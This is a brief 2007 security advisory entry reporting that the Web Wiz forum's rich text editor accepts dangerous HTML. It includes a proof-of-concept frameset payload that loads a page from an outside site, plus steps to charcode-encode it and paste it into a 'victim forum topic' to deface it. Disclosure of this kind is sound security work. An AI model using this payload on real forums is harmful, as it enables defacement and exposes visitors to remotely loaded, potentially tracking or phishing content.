Webwiz vulnerable

2007-06-12T00:00:00
ID SECURITYVULNS:DOC:17241
Type securityvulns
Reporter Securityvulns
Modified 2007-06-12T00:00:00

Description

Webwiz vulnerable

Versiyon: all versions are vulnerable

Poc:

it's vulnerable because of the rich text editor it accept codes which are dangerous

When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz

the code is this

<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0> <frame frameborder=0 src=http://www.spykod.net/js/spy.html></frameset>

hex it with charcode then save it as html then make ctrl a ctrl c after it paste it to victim forum topic : )

spymaster@spykod.net www.spykod.net